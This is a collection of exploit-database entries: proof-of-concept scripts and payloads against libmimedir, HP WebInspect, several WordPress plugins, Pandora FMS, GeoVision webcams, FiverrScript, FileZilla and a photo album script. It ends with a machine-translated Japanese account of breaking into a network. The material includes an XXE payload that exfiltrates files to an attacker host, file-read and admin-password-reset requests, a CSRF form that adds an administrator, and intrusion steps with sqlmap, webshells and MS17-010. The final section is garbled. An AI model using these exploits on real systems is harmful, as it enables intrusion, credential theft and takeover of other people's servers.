'EXPLOIT' IS SHIT LIKE ALL OF HAK5 'SHOWS' <<< | | <<< NOT TO BE (RE)PUBLISHED ON 1337DAY/INJ3CT0R >>> | <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> __ ___________ ____ ____ _____ | | __ ___________ \____ \__ \ / \_/ ___\\__ \ | |/ // __ \_ __ \ | |_> > __ \| | \ \___ / __ \| <\ ___/| | \/ | __(____ /___| /\___ >____ /__|_ \\___ >__| |__| \/ \/ \/ \/ \/ \/ .........................cant be pr0 without ascii art

#!/usr/bin/python # libmimedir-free.py # # Libmimedir VCF Memory Corruption PoC (CVE-2015-3205) # # Jeremy Brown [jbrown3264/gmail] # June 2015 # # -Synopsis- # # Adding two NULL bytes to the end of a VCF file allows a user to manipulate free() calls # which occur during it's lexer's memory clean-up procedure. This could lead to exploitable # conditions such as crafting a specific memory chunk to allow for arbitrary code execution. # # -Tested- # # libmimedir-0.5.1.tar.gz # libmimedir-static 0.4-13.fc21 # # -Notes- # # Reported to Red Hat Bugzilla in May (1222251) and remains unfixed as of now. There's already # a stale bug (1049214) to upgrade to latest upstream and there wasn't a movement to work on a # fix with this one. yy_get_next_buffer() in dirlex.c would likely take the patch. # from struct import pack def main(): mime = "begin:vcard<x\nx;type=x;type=x," mime += pack("<Q", 0x4141414141414141) # mdm->p mime += pack("<Q", 0x4242424242424242) # mdm->next mime += ":x>x.l:x" mime += pack("<H", 0x0000) # 2 x YY_END_OF_BUFFER_CHAR print("Writing free.vcf to local directory...") try: with open("free.vcf", 'wb') as outfile: outfile.write(mime) except Exception as error: print("Error: %s\n" % error); return print("Done\n") return if __name__ == "__main__": main()

# Exploit Title: HP WebInspect - XML External Entity # Date: 23\04\2015 # Exploit Author: Jakub Palaczynski # Vendor Homepage: http://www.hp.com/ # Version: 10.4, 10.3, 10.2, 10.1, 10.0, 9.x, 8.x, 7.x # CVE : CVE-2015-2125 1. Create website that exploits vulnerability. 1.1. Website that steals files using OOB technique: 1.1.1. Website that triggers vulnerability: <html> <body> <form action="/" method="POST"> <input type="hidden" name="payload" value='<?xml+version="1.0"+encoding="utf-8"?><!DOCTYPE+m+[+<!ENTITY+%25+remote+SYSTEM+"http://attacker/file.xml">%25remote;%25int;%25trick;]><tag></tag>'/> <input type="submit" value="Submit" /> </form> </body> </html> 1.1.2. file.xml file that is served on attacker's host. This file specifies which file should be retrieved from remote host and where content of that file should be sent: <!ENTITY % payl SYSTEM "file:///C:/Windows/system.ini"> <!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://attacker/?p=%payl;'>"> 1.2. Website that steals hashes of Administrator user: 1.2.1. Website that triggers vulnerability: <html> <body> <form action="/" method="POST"> <input type="hidden" name="payload" value='<?xml+version="1.0"+encoding="utf-8"?><!DOCTYPE+m+[+<!ENTITY+%25+remote+SYSTEM+"\\attacker\path\file.txt">%25remote;]><tag></tag>'/> <input type="submit" value="Submit" /> </form> </body> </html> 1.2.2. Attacker needs to start tool on the server that captures hashes. 2. Exploit is triggered while profiling or scanning created application using vulnerable versions of HP WebInspect.

# Exploit Title: Wordpress History Collection <=1.1.1 Arbitraty File Download # Google Dork: inurl:plugins/history-collection # Date: 10/06/2015 # Exploit Author: Kuroi'SH # Software Link: https://wordpress.org/plugins/history-collection/ # Version: <=1.1.1 # Tested on: Linux I-Description: Wordpress history collection plugin contains a file called download.php which is not filtering the GET input, it then uses this get input value to force the download of a file. (download.php, line 44): header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" ); 2:Proof of concept: http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=yourfile http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php php -r "echo @file_get_contents(' http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php') ;" Greetz: Moh Ooasiic, Virus Os, Black Sniper, T3N38R15, Green Ghost, n37_worm, MuhmadEmad, redsm0ke By Kuroi'SH

# Exploit Title: Wordpress Plugin RobotCPA V5 - Local File Include # Google Dork: inurl:"/wp-content/plugins/robotcpa/" # Date: 09.06.2015 # Exploit Author: T3N38R15 # Vendor Homepage: http://robot-cpa.good-info.co/ # Version: 5V # Tested on: Windows (Firefox) Linux (Firefox) The affected file is f.php and the get-parameter "l" is vulnerable to local file inclusion. We just need to base64 encode our injection. Like that : php://filter/resource=./../../../wp-config.php cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA== or file:///etc/passwd ZmlsZTovLy9ldGMvcGFzc3dk our injection look then like that : http://domain.com/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk and we can see the content of the passwd file. greets to Black Sniper Regards T3N38R15

# Exploit Title: Paypal Currency Converter Basic For Woocommerce File Read # Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce" # Date: 10/06/2015 # Exploit Author: Kuroi'SH # Software Link: https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/ # Version: <=1.3 # Tested on: Linux Description: proxy.php's code: <?php $file = file_get_contents($_GET['requrl']); $left=strpos($file,'<div id=currency_converter_result>'); $right=strlen($file)-strpos($file,'<input type=hidden name=meta'); $snip= substr($file,$left,$right); echo $snip; ?> Based on user input, the content of a file is printed out (unfortunately not included) so any html file can be loaded, and an attacker may be able to read any local file which is not executed in the server. Example: http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd POC: curl --silent --url http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd

# Exploit Title: Authentication Bypass in Pandora FMS # Google Dork: intitle:"Pandora FMS - The Flexible Monitoring System" intitle:"Pandora FMS - el Sistema Flexible de Monitorización" # Date: 10/06/2015 # Exploit Author: Manuel Mancera (sinkmanu) | mmancera (at) a2secure (dot) com # Vendor Homepage: http://pandorafms.com/ <http://pandorafms.com/> # Software Link: http://pandorafms.com/ <http://pandorafms.com/> # Version: 5.0, 5.1 # Vulnerability Type : Authentication Bypass # Severity : High ### Description ### A vulnerability has been discovered in Pandora FMS that permits an unautheticated user to change the password for any Pandora user without knowing the actual user password. The vulnerability occurs at the login screen due to the session not being checked before the password is changed. ### Proof of Concept ### URL: /index.php Method: POST Payload: renew_password=1&login=admin Payload2: renew_password=1&login=admin&password_new=newpass&password_confirm=newpass ### Exploit ### curl -d "renew_password=1&login=admin&password_new=newpass&password_confirm=newpass" http://localhost/index.php <http://localhost/index.php> ### Solution ### Apply the latest patches available at the vendor website. #################################################################### Disclaimer -------------------- All information is provided without warranty. The intent is to provide information to secure infrastructure and/or systems, not to be able to attack or damage. Therefore A2Secure shall not be liable for any direct or indirect damages that might be caused by using this information. ####################################################################

#!/usr/bin/python import os import sys import socket import binascii ''' Title : GeoVision GeoHttpServer WebCams Remote File Disclosure Exploit CVE-ID : none Product : GeoVision System : GeoHttpServer Affected : 8.3.3.0 (may be more) Impact : Critical Remote : Yes Website link: http://www.geovision.com.tw/ Reported : 10/06/2015 Author : Viktor Minin, minin.viktor@gmail.com -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- No authentication (login) is required to exploit this vulnerability. The GeoVision GeoHttpServer application is prone to a remote file disclosure vulnerability. An attacker can exploit this vulnerability to retrieve and download stored files on server such as 'boot.ini' and 'win.ini' by using a simple url request which made by browser. ''' #os.system("cls") os.system('title GeoVision GeoHttpServer Webcams Remote File Disclosure Exploit'); os.system('color 2'); socket.setdefaulttimeout = 0.50 os.environ['no_proxy'] = '127.0.0.1,localhost' CRLF = "\r\n" def main(): print "#######################################################################" print "# GeoVision GeoHttpServer Webcams Remote File Disclosure Exploit" print "# Usage: <ip> <port> <file>" print "# Example: " +sys.argv[0]+ " 127.0.0.1 1337 windows\win.ini" print "#######################################################################" exit() try: url = sys.argv[1] port = int(sys.argv[2]) #files = open(sys.argv[3],'r').read().split() file = sys.argv[3] except: main() def recvall(sock): data = "" part = None while part != "": part = sock.recv(4096) data += part return data def request(url, port, pfile): PATH = str(pfile) HOST = url PORT = port sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.connect((HOST, PORT)) sock.send("GET /...\...\\" + PATH + "%s HTTP/1.0\r\n\r\n" % (CRLF)) data = recvall(sock) temp = data.split("\r\n\r\n") sock.shutdown(1) sock.close() return temp[1] ret = request(url, port, file) hex = "".join("{:02x}".format(ord(c)) for c in ret) bin = binascii.unhexlify(hex) print ret file = open(file.replace('\\', '_'),"wb") file.write(bin) file.close() #~EOF

# Exploit Title: FiverrScript CSRF Vulnerability (add New admin) # Author: Mahmoud Gamal (@Zombiehelp54) # Google Dork: intext:Powered by FiverrScript # Date: 10/06/2015 # Exploit Author: Scriptolution # Vendor Homepage: http://scriptolution.com # Software Link: http://fiverrscript.com # Version: 7.2 # Tested on: Windows FiverrScript is vulnerable to CSRF attack (No CSRF token in place) meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), a form will be submitted to (http://localhost/fiverrscript/administrator/admins_create.php) that will add a new user as administrator. Once exploited, the attacker can login to the admin panel ( http://localhost/fiverrscript/administrator/index.php) using the username and the password he posted in the form. CSRF PoC Code ============= <form action="http://localhost/fiverrscript/administrator/admins_create.php" method="post" id="main_form" name="main_form" enctype="multipart/form-data"><input type="hidden" id="submitform" name="submitform" value="1"> <input type="hidden" name="username" value="attackerUsername"> <input type="hidden" name="password" value="attackerPreferedPW" > <input type="hidden" name="email" value="attackeremail@something.com"> </form> <script> document.forms[0].submit(); </script> Reported to script owner. Security Level: ================ High

''' # Exploit title: filezilla 3.11.0.2 sftp module denial of service vulnerability # Date: 5-6-2015 # Vendor homepage: http://www.chiark.greenend.org.uk # Software Link: http://dl.filehorse.com/win/file-transfer-and-networking/filezilla/FileZilla-3.11.0.2.exe?st=6b87ZegIN1LDhSGAw5M4wg&e=1434351489&fn=FileZilla_3.11.0.2_win32-setup.exe # Version: 3.11.0.2 # Author: 3unnym00n # Details: # -------- # sftp module for filezilla based on putty's psftp component. # when doing the ssh dh group exchange old style, if the server send a malformed dh group exchange reply, can lead the filezilla component crash # Tested On: win7, xp # operating steps: run the py, then execute : "D:\programfile\FileZilla FTP Client\filezilla.exe" sftp://root@127.0.0.1 ''' import socket import struct soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) soc.bind(('127.0.0.1', 22)) soc.listen(1) client, addr = soc.accept() ## do banner exchange ## send server banner client.send('SSH-2.0-SUCK\r\n') ## recv client banner client_banner = '' while True: data = client.recv(1) if data == '\x0a': break client_banner += data print 'the client banner is: %s'%client_banner.__repr__() ## do key exchange ## recv client algorithms str_pl = client.recv(4) pl = struct.unpack('>I', str_pl)[0] client.recv(pl) ## send server algorithms client.send('000001b4091464f9a91726b1efcfa98bed8e93bbd93d000000596469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d616e2d67726f7570312d73686131000000077373682d727361000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f7572323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f75723235360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d39360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d3936000000046e6f6e65000000046e6f6e6500000000000000000000000000000000000000000000'.decode('hex')) ## do dh key exchange ## recv dh group exchange request str_pl = client.recv(4) pl = struct.unpack('>I', str_pl)[0] client.recv(pl) ## send dh group exchange group client.send('00000114081f0000010100c038282de061be1ad34f31325efe9b1d8520db14276ceb61fe3a2cb8d77ffe3b9a067505205bba8353847fd2ea1e2471e4294862a5d4c4f9a2b80f9da0619327cdbf2eb608b0b5549294a955972aa3512821b24782dd8ab97b53aab04b48180394abfbc4dcf9b819fc0cb5ac1275ac5f16ec378163501e4b27d49c67f660333888f1d503b96fa9c6c880543d8b5f04d70fe508ffca161798ad32015145b8e9ad43aab48ada81fd1e5a8ea7711a8ff57ec7c4c081b47fab0c2e9fa468e70dd6700f3412224890d5e99527a596ce635195f3a6d35e563bf4892df2c79c809704411018d919102d12cb112ce1e66ebf5db9f409f6c82a6a6e1e21e23532cf24a6e300000001020000000000000000'.decode('hex')) ## recv dh group exchange init str_pl = client.recv(4) pl = struct.unpack('>I', str_pl)[0] client.recv(pl) ## send dh group exchange reply dh_gex_reply_msg = '\x00\x00\x02\x3c' ## pl dh_gex_reply_msg += '\x09' ## padding len dh_gex_reply_msg += '\x21' ## dh gex reply dh_gex_reply_msg += '\x00\x00\xff\xff' ## dh host key len dh_gex_reply_msg += 'A'*600 client.sendall(dh_gex_reply_msg)

source: https://www.securityfocus.com/bid/53641/info The AZ Photo Album is prone to a cross-site-scripting and an arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input. Attackers can exploit these issues to steal cookie information, execute arbitrary client side script code in the context of browser, upload and execute arbitrary files in the context of the webserver, and launch other attacks. http://www.example.com/demo/php-photo-album-script/index.php/%F6%22%20onmouseover=document.write%28%22google.com%22%29%20 http://www.example.com/demo/php-photo-album-script/index.php/?gazpart=suggest

0x01注入点が見つかりました ストーリーの理由は、私があまりにもアイドル状態で、魚を捕まえるために仕事に行くからです。 触れたとき、特定のWebサイトのクエリボックスに触れました。 その後、古い問題が発生し、クエリを入力しました。 次に、1 'を入力します TSK TSK、これは明らかにSQL注入です。 SQLMapアーティファクトを決定的に取り出します。 エンディングは完璧であり、注入だけでなく、DBAの許可もあります。 0x02ウェブサイトGet Shell SQLインジェクションを使用してシェルを取得する一般的な方法がいくつかあります。 1つは、データを実行し、ディレクトリを介してWebサイト管理の背景を検索し、バックグラウンドを入力して、ファイルのアップロードを介してシェルを取得する方法を見つけるか、エラーレポート、PHPINFOインターフェイス、404インターフェイス、およびその他のメソッドを使用してWebサイトの絶対パスを知ることです。ただし、MySQLに比べて条件はまだ少し厳しいです。 それから私は剣を取り出し、ウェブサイトディレクトリをスキャンし始めました。 自由に管理者をクリックします 私は行ったところ、実際にはディレクトリトラバーサルがありました。 その後、00/をクリックしました 口いっぱいの古い血が噴出されました。これは始まる前に終わりましたか？ 絶対的なパスは招かれず、実際に最も一般的なパスです。私は以前にそれを知っていました - 一般的なパスを実行するためにos -shell- sqlmapに涙を浮かべて絶対的なパスを直接保持します-os-shell ここに理解するポイントがあります。 MySQLデータベース-SQLMapのOS -ShellがSQLMAPを最初にファイルを書き込み、シェルTMPXXXX.PHPをアップロードし、ファイルを介してシェルアップロードコマンドをアップロードしてシェルTMPXXXX.PHPを実行し、コマンドを使用してシェル実行コマンドを実行します。 詳細については、Yujiujiuのブログにアクセスして学習できます。 https://www.cnblogs.com/rain99-/p/13755496.html そこで、ここでは、SQLMAPファイルによってアップロードされたシェルを使用してシェルを直接アップロードしました。 ここにも問題があります、あなたはテンテイ・トロイの木馬でアサート関数を使用することはできません 最後に、私はトロイの木馬に変更して、シェルを正常に取りました シェルを取得するプロセスは以前にあまりにも滑らかだったので、ディレクトリトラバーサルを注意深く見ませんでした。ただし、この記事を書くとき、ディレクトリのファイルトラバーサルを注意深く調べて、不正なアップロードポイントを正常に見つけました。つまり、不正なアップロード +ディレクトリトラバーサルを介してファイルアップロードフォルダーを見つけることができ、シェルを取得できます。 0x03予備情報収集 シェルを持っているので、最初のステップは情報を収集することです。 上記から、現在のユーザーは、イントラネット環境を備えたシステムとServer2012を備えたサーバーであり、キラーESET NOD32がインストールされていることがわかります。 次に、イントラネットのサバイバルマシンを見てみましょう。 NBTSCAN、ICMPプロトコル、ARPスキャン、スキャンラインなど、イントラネットの生存マシンを検出する方法はたくさんあります。ここでは、運用の利便性のために、操作前に直接オンラインになります。 シェルコードは、殺すことなく完全に起動されます ここでは、K8GEGEラドンプラグインを使用してイントラネットをスキャンすると、メインスキャンの結果がより美しいです。 スキャン結果の一部を次に示します イントラネットには多くの生き残ったホストがあることがわかります。このWebサーバーにはドメイン環境はありませんが、スキャン結果にはADなどの敏感な単語が含まれています。イントラネットには少なくとも2つのドメイン環境があると推定されています。現時点では、詳細情報収集が必要であり、イントラネットトポロジ図が描かれています。 0x04水平浸透さらに情報収集イントラネットの最初の波はMS17-010です。ここではK8gegeのラドンも使用します。 イントラネットには、MS17-010がある可能性のあるいくつかのマシンが実際にあることがわかります。ここで一つずつプレイするのは時間の無駄であり、主に不確実性があります。そのWebサーバーにはソフトキル入力ソフトウェアがインストールされており、イントラネットにもソフトキル入力ソフトウェアが必要なため、ドメイン内のホストである可能性のあるサーバーをターゲットにします。 その後、CSはソックスプロキシを開始し、MSFのプロキシを準備して戦いを開始します。 また、ローカルKALI仮想マシンにプロキシを掛けることは非常に簡単です。 sudo vim /etc/proxychains.conf CSの行のIPを挿入し、下部に開いたポートを挿入します Proxychains MSFConsoleでMSFを保存して開始します その後、EXPがターゲットマシンに衝突したときに何かがうまくいかなかった。ソフトウェアを殺すマシンがインタラクティブな実行を傍受したはずです。そこで、一度に1つのコマンドのみをロードできるExpを見つけて、ユーザーを追加しました。 1か月前にこのスタンドを最後に見たときから、この記事を書いていたときに17010年を再現することに成功しませんでした。以前にターゲットマシンにアカウントを追加したため、ログインしてそれを見て、未知のda heikuoによってサーバーがランサムウェアに置かれていることがわかりました。 そのため、次の繁殖プロセスは継続せず、このイントラネットを後で見続けませんでした。 ドメイン環境の浸透の一般的なアイデアについて話しましょう： まず、ターゲットマシンがドメイン環境にあるかどうかを判断します。ドメイン環境にある場合、 まず、オンラインでハッシュを読み取る権限を増やし、ドメイン管理アカウントを読み取ることができるかどうかを確認するか、ドメイン管理プロセスがあるかどうかを確認し、インジェクションを処理してからハッシュを渡してハッシュを介してドメイン制御を取得し、ドメイン内のすべてのハッシュをエクスポートします。 上記の方法が機能しない場合は、MS14-068、MS14-025、CVE-2020-1472などの一般的なドメイン特権を調達することもできます。 動作しない場合は、ドメイン内のWebまたは一般的なデバイスをスキャンし、デバイスの脆弱性またはWeb脆弱性から始めて、ドメイン制御マシンを段階的に段階的にします。 しかし、注意すべきことの1つは、イントラネットの浸透プロセス全体で、目標を明確にする必要があるということです。そうしないと、多くの時間が無駄になることです。同時に、あなたの思考は柔軟で変化しやすく、単一のポイントを握ろうとしないでください。 0x03要約 1。ターゲットサイトクエリに1 'を入力し、SQLエラーを表示します。 SQLインジェクション2がある場合があります。2。data.txtとしてBPを介してクエリのパケットキャプチャを保存し、SQLMAP -R data.txtを介して注入します。注入の脆弱性があり、データベースの許可がDBAであることがわかります。 3. Yujianディレクトリスキャンツールを使用して、ターゲットサイトディレクトリをスキャンし、管理者ディレクトリステータスがHTTP200。4であることを確認します。 00/エラーの報告など、Admin Directoryの下のフォルダーに自由にアクセスし、エラーがWebサイトの物理パスを表示します。 5。sqlmapの-os-shellパラメーターを介して文を書きます。6。アリの剣リンクを使用して文をリンクします。ディレクトリをチェックすると、/js/jqery_file_upload/に不正なアップロードポイントがあることがわかります。このアップロードポイントを介して、トロイの木馬をアップロードして、ディレクトリトラバーサルを介してアップロードされたファイルパスを見つけることができます。 7。ANTソードの仮想コマンド端子を介してIPアドレスをクエリし、システムプロセス（AVがあるかどうか）、システム情報およびパッチ情報IPConfig -168.1.34（ターゲットサイトイントラネットIPアドレス）タスクリスト/SVC ---- EKM.EXEおよびEGUIPROXY.EXE（EST NOD32 KILL）SystemINFO8。 VPSでコバルストライクを実行し、PSバックドアプログラムを生成し、バックドアの殺害を免除します（PowerShellを無料で使用することをお勧めします）。 Ant Swordを介してPSスクリプトをターゲットサイトサーバーにアップロードして実行し、オンラインで正常に進みます。 9。CSにdon.exeをアップロードし、Ladon 192.168.1.0/24 Osscanを使用してシステムバージョン10をスキャンします。同時に、Ladon 192.168.1.0/24 MS17-010も使用して永遠の青い脆弱性をスキャンし、複数のホストが存在することがわかりました。ローカルKALIの次の構成ファイルを使用して、socks5プロキシVim /etc/proxychains.confsocks4ターゲットIP：223313を追加します。 Webサーバーにはnod32がインターネットにインストールされているため、他のネットワークセグメントがあるはずです。 MS17-010を試してみると、成功しません。 出典：https://xz.aliyun.com/t/8586